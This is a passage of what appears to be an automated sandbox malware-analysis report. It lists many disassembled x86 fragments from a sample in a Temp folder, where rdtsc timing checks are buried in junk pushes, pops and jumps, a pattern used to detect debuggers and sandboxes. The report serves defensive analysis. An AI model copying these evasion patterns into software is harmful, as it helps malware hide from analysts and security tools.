                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7AE499 second address: 7AE49E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7B036E second address: 7B0396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F69D121AB26h 0x00000009 jne 00007F69D121AB26h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jne 00007F69D121AB26h 0x0000001e jno 00007F69D121AB26h 0x00000024 popad 0x00000025 push ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B70032 second address: 4B70038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B70038 second address: 4B7003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B7003C second address: 4B700B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007F69D1080A4Fh 0x00000012 pushfd 0x00000013 jmp 00007F69D1080A58h 0x00000018 add cx, B948h 0x0000001d jmp 00007F69D1080A4Bh 0x00000022 popfd 0x00000023 pop eax 0x00000024 jmp 00007F69D1080A59h 0x00000029 popad 0x0000002a xchg eax, ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F69D1080A4Dh 0x00000032 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B700B3 second address: 4B7010B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F69D121AB2Eh 0x00000010 pop ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F69D121AB38h 0x0000001a jmp 00007F69D121AB35h 0x0000001f popfd 0x00000020 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50DD3 second address: 4B50DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50DD7 second address: 4B50DF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50DF2 second address: 4B50DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50DF8 second address: 4B50DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50DFC second address: 4B50E17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop eax 0x00000011 movsx ebx, cx 0x00000014 popad 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50E17 second address: 4B50E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, BD39h 0x00000011 pushfd 0x00000012 jmp 00007F69D121AB36h 0x00000017 sbb eax, 79782F48h 0x0000001d jmp 00007F69D121AB2Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50E66 second address: 4B50E93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F69D1080A4Dh 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50E93 second address: 4B50EFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F69D121AB37h 0x00000009 and ax, EF9Eh 0x0000000e jmp 00007F69D121AB39h 0x00000013 popfd 0x00000014 jmp 00007F69D121AB30h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e jmp 00007F69D121AB30h 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx edx, ax 0x0000002a push eax 0x0000002b pop edx 0x0000002c popad 0x0000002d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50EFC second address: 4B50F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50F02 second address: 4B50F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50F06 second address: 4B50F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90EB7 second address: 4B90ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90ED2 second address: 4B90EF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F69D1080A59h 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90EF4 second address: 4B90F0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4AB52232h 0x00000008 mov bh, 2Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop esi 0x00000015 mov dh, 74h 0x00000017 popad 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90F0C second address: 4B90F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90F12 second address: 4B90F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B300A2 second address: 4B30100 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F69D1080A58h 0x00000008 sbb cx, 7478h 0x0000000d jmp 00007F69D1080A4Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F69D1080A58h 0x0000001b add ch, FFFFFFD8h 0x0000001e jmp 00007F69D1080A4Bh 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30100 second address: 4B30112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30112 second address: 4B30119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30119 second address: 4B30138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F69D121AB35h 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30138 second address: 4B3016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F69D1080A58h 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B3016B second address: 4B3017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B3017A second address: 4B30192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A54h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30192 second address: 4B30196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50BA3 second address: 4B50BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50BA9 second address: 4B50BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50BAD second address: 4B50BEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movzx ecx, dx 0x0000000d mov ah, dl 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F69D1080A54h 0x0000001a sub si, 76E8h 0x0000001f jmp 00007F69D1080A4Bh 0x00000024 popfd 0x00000025 push ecx 0x00000026 pop edx 0x00000027 popad 0x00000028 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50BEA second address: 4B50C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 0Ah 0x00000005 mov eax, 77543D73h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F69D121AB34h 0x00000015 adc ch, 00000078h 0x00000018 jmp 00007F69D121AB2Bh 0x0000001d popfd 0x0000001e mov si, CFAFh 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50C2A second address: 4B50C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50C2E second address: 4B50C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50819 second address: 4B5089F instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 4A3A231Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F69D1080A4Fh 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F69D1080A54h 0x00000017 add esi, 221FB118h 0x0000001d jmp 00007F69D1080A4Bh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F69D1080A58h 0x00000029 xor si, 9B78h 0x0000002e jmp 00007F69D1080A4Bh 0x00000033 popfd 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F69D1080A55h 0x0000003e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B5089F second address: 4B508AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D121AB2Ch 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B508AF second address: 4B508C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f mov dl, 80h 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B506FB second address: 4B506FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B506FF second address: 4B50705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50705 second address: 4B5071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D121AB36h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B5071F second address: 4B5073A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov esi, 72953AC1h 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B5073A second address: 4B507BF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F69D121AB2Eh 0x00000008 sbb ecx, 16C6A2D8h 0x0000000e jmp 00007F69D121AB2Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007F69D121AB38h 0x0000001b pushfd 0x0000001c jmp 00007F69D121AB32h 0x00000021 jmp 00007F69D121AB35h 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov dx, si 0x00000030 call 00007F69D121AB34h 0x00000035 pop esi 0x00000036 popad 0x00000037 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B507BF second address: 4B507C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B507C5 second address: 4B507C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B507C9 second address: 4B507CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B5042A second address: 4B5042E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B5042E second address: 4B50434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50434 second address: 4B5045D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F69D121AB2Dh 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B5045D second address: 4B504A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F69D1080A57h 0x00000008 pop ecx 0x00000009 call 00007F69D1080A59h 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F69D1080A4Ah 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B504A3 second address: 4B504A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B504A9 second address: 4B504AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B504AD second address: 4B504B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B601E3 second address: 4B601FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A58h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B601FF second address: 4B6022A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F69D121AB2Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 jmp 00007F69D121AB2Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 mov edx, esi 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90E4C second address: 4B90E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90E52 second address: 4B90E8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F69D121AB30h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F69D121AB37h 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90E8E second address: 4B90E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90E94 second address: 4B90E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B704B6 second address: 4B704BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B704BB second address: 4B70528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F69D121AB34h 0x00000009 add ax, DBC8h 0x0000000e jmp 00007F69D121AB2Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F69D121AB38h 0x0000001a or si, DE28h 0x0000001f jmp 00007F69D121AB2Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 and dword ptr [eax], 00000000h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F69D121AB30h 0x00000034 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B70528 second address: 4B70537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B70537 second address: 4B7053E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B7053E second address: 4B70566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and dword ptr [eax+04h], 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F69D1080A59h 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B70566 second address: 4B7056C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B5058B second address: 4B505C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F69D1080A4Dh 0x00000013 jmp 00007F69D1080A4Bh 0x00000018 popfd 0x00000019 push esi 0x0000001a pop ebx 0x0000001b popad 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B505C8 second address: 4B5062D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F69D121AB2Bh 0x00000009 sbb cx, B72Eh 0x0000000e jmp 00007F69D121AB39h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F69D121AB2Dh 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F69D121AB2Ch 0x00000027 sbb ax, 0FD8h 0x0000002c jmp 00007F69D121AB2Bh 0x00000031 popfd 0x00000032 push eax 0x00000033 push edx 0x00000034 mov edx, ecx 0x00000036 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B5062D second address: 4B50651 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F69D1080A58h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B50651 second address: 4B50675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 call 00007F69D121AB2Dh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, 14C61A4Fh 0x00000018 mov dx, cx 0x0000001b popad 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B60EA2 second address: 4B60EC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F69D1080A4Fh 0x00000008 pop ecx 0x00000009 mov si, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ebx, ecx 0x00000015 push eax 0x00000016 pop ebx 0x00000017 popad 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B70222 second address: 4B70228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B70228 second address: 4B7022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B7022C second address: 4B7025A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F69D121AB2Ch 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B7025A second address: 4B7029C instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ecx, edx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov edx, eax 0x0000000e movzx eax, di 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F69D1080A56h 0x0000001c sbb eax, 5B45EA88h 0x00000022 jmp 00007F69D1080A4Bh 0x00000027 popfd 0x00000028 mov ch, 02h 0x0000002a popad 0x0000002b rdtsc
